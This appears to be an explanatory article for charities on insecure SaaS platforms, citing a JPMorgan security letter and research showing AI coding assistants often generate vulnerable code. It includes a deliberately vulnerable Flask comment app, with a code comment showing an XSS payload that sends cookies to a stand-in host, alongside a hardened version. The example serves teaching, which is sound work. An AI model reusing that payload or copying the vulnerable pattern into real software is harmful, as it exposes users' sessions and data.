JPMorgan’s warning and new research reveal the hidden risks of insecure SaaS platforms built at speed.
The invisible risk beneath the surface
Charities today are increasingly reliant on digital platforms to manage grants, store confidential beneficiary information, and streamline operations. But a recent open letter from JPMorgan Chase’s Chief Information Security Officer has sounded the alarm: the very SaaS models enabling this digital transformation are embedding unseen vulnerabilities into critical systems.
And new research from Backslash Security highlights why: AI-assisted development tools, widely adopted by developers to code faster, are introducing security weaknesses at scale.
For charities handling sensitive data, the convergence of these risks could have devastating consequences.
AI-driven development: speed without safeguards?
The rise of AI coding assistants – tools such as Cursor and GitHub Copilot – is reshaping how software is built. Developers, including those without deep technical expertise, are using AI to accelerate development, ship features faster, and meet growing demands.
But Backslash Security’s research reveals a troubling truth: unless explicitly prompted with detailed, security-focused instructions, AI-generated code is insecure by default. In testing, even advanced models such as GPT-4o and Claude left critical vulnerabilities – cross-site scripting (XSS), server-side request forgery (SSRF), command injection, and cross-site request forgery (CSRF) – unaddressed in 40% to 90% of outputs.
This finding echoes JPMorgan’s broader concern: software providers are prioritising speed and feature delivery over robust security. For charities adopting platforms developed with AI tools and rapid iteration, this raises an uncomfortable question: how secure is the code handling your most sensitive data?
The collapse of security boundaries
Historically, strong security relied on architectural safeguards: strict segmentation between internal and external systems, layered access controls, and limited trust between components. JPMorgan’s letter warns that modern SaaS models – especially those built with rapid AI-assisted development – dismantle these boundaries.
Instead of carefully separated systems, we now see direct integrations between third-party services and sensitive internal data, often relying on simple authentication tokens and broad permissions. As the letter states, “this architectural regression undermines fundamental security principles.”
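To make that anti-pattern concrete, here is a minimal sketch contrasting a broad, long-lived integration token with a least-privilege alternative. The platform, endpoints, and scopes are hypothetical, invented for illustration rather than drawn from the letter:

```python
# Hypothetical grants platform: names, endpoints, and scopes are illustrative.
import requests

API = "https://api.example-grants-platform.org"

def fetch_beneficiaries_broad(token: str) -> list:
    # Anti-pattern: one long-lived token carrying blanket "admin:*" permissions,
    # shared across the whole integration. If it leaks, the attacker inherits
    # access to everything the platform holds.
    resp = requests.get(
        f"{API}/v1/beneficiaries",
        headers={"Authorization": f"Bearer {token}"},
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()

def fetch_scoped_token(client_id: str, client_secret: str, scope: str) -> str:
    # Safer pattern: exchange client credentials for a short-lived token
    # limited to a single scope (e.g. "grants:read", never "admin:*"), so a
    # compromised credential bounds the damage to one function, not the dataset.
    resp = requests.post(
        f"{API}/oauth/token",
        data={"grant_type": "client_credentials", "scope": scope},
        auth=(client_id, client_secret),
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()["access_token"]
```

The difference is blast radius: with narrowly scoped, expiring credentials, one leaked token no longer exposes an entire community’s records.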
For charities trusting platforms to manage confidential beneficiary data, this risk is not theoretical. One weak integration, one compromised token, or one overlooked vulnerability in a rapidly developed platform could expose entire communities.
Insecure by default: the evidence
Backslash Security’s study tested leading AI models by asking them to generate common functionality – such as a comment section or a file upload feature – without specific security prompts. The results were alarming (a sketch of typical vulnerable output follows the list below):
- GPT-4o produced vulnerable code 90% of the time.
- Even Claude, one of the best performers, produced vulnerable code 40% of the time.
- Vulnerabilities included XSS, SSRF, command injection, CSRF, and insecure file handling.
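To see what this looks like in practice, here is a deliberately vulnerable sketch of the kind of comment feature the study asked the models to build – an illustrative reconstruction in Python/Flask, not code taken from the Backslash report:

```python
# Insecure by default: a Flask comment feature that stores user input verbatim
# and interpolates it straight into HTML. (Illustrative reconstruction.)
from flask import Flask, request

app = Flask(__name__)
comments: list[str] = []

@app.route("/comment", methods=["POST"])
def add_comment():
    comments.append(request.form["text"])  # no validation, no sanitisation
    return "ok"

@app.route("/comments")
def show_comments():
    # Stored XSS: a comment such as
    #   <script>fetch('https://evil.example/?c=' + document.cookie)</script>
    # is rendered as live markup and runs in every visitor's browser.
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"
```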
Only when detailed, security-focused prompts – or dedicated security rules – were applied did the models consistently generate secure code (a hardened version of the earlier sketch follows below). This reinforces JPMorgan’s warning: security must be built in by design, not added as an afterthought.
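For contrast, here is the same sketch after the kind of security-focused pass the research describes: output is escaped, requests carry a CSRF token, and input is validated. Again a hedged illustration, not production code:

```python
# The same feature after a security-focused pass: escaped output, a per-session
# CSRF token, and basic input validation. Still a sketch, not production code.
import secrets

from flask import Flask, abort, request, session
from markupsafe import escape

app = Flask(__name__)
app.secret_key = secrets.token_hex(32)
comments: list[str] = []

@app.route("/")
def comment_form():
    # Issue a CSRF token tied to this session and embed it in the form.
    token = session.setdefault("csrf_token", secrets.token_hex(16))
    return (f'<form method="post" action="/comment">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            f'<textarea name="text"></textarea><button>Post</button></form>')

@app.route("/comment", methods=["POST"])
def add_comment():
    # CSRF defence: reject requests that lack this session's token.
    if request.form.get("csrf_token") != session.get("csrf_token"):
        abort(403)
    text = request.form.get("text", "")
    if not text or len(text) > 2000:  # basic input validation
        abort(400)
    comments.append(text)
    return "ok", 201

@app.route("/comments")
def show_comments():
    # escape() neutralises embedded HTML, so a <script> payload displays as text.
    return "<ul>" + "".join(f"<li>{escape(c)}</li>" for c in comments) + "</ul>"
```

None of these safeguards appear by accident – they show up only when someone, human or prompt, insists on them.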
In an industry moving towards AI-assisted, fast-paced development, platforms without formal security guardrails risk embedding systemic vulnerabilities into the very tools charities depend on.
But what does this mean in practice? For a charity, it could mean a cyber attacker exploiting one of these hidden vulnerabilities to access sensitive beneficiary data – names, addresses, medical histories, financial details. It could mean unauthorised access to grant applications, internal communications, or even bank account information. Beyond data loss, the reputational damage could be irreversible, undermining donor trust and endangering future funding. A single breach doesn’t just expose data; it compromises the people and communities charities exist to protect.
What this means for charities
Choosing a platform isn’t just about features or speed to market. It’s about trust.
A platform developed with AI tools, rushed timelines, and without rigorous security oversight may function beautifully – until it doesn’t. A breach won’t just affect one charity; it could ripple across every organisation sharing that platform.
When selecting a provider to handle sensitive operations, charities must ask hard questions:
- How was the platform developed, and what security processes were followed?
- How are security risks identified, mitigated, and validated?
- Is the platform audited beyond annual compliance checkboxes?
- How is beneficiary data protected from unauthorised access or breach?
In conclusion: build on trust, not just speed
JPMorgan’s letter and Backslash Security’s findings both point to the same conclusion: in today’s digital landscape, speed and convenience cannot come at the expense of security.
Charities must partner with platforms that treat security as a first principle – not as an optional layer or marketing slogan. Because when it’s your beneficiaries’ data, your donors’ trust, and your mission on the line, shortcuts aren’t an option.
In a world where AI accelerates development, it’s those who embed security from the start who will earn – and deserve – your trust.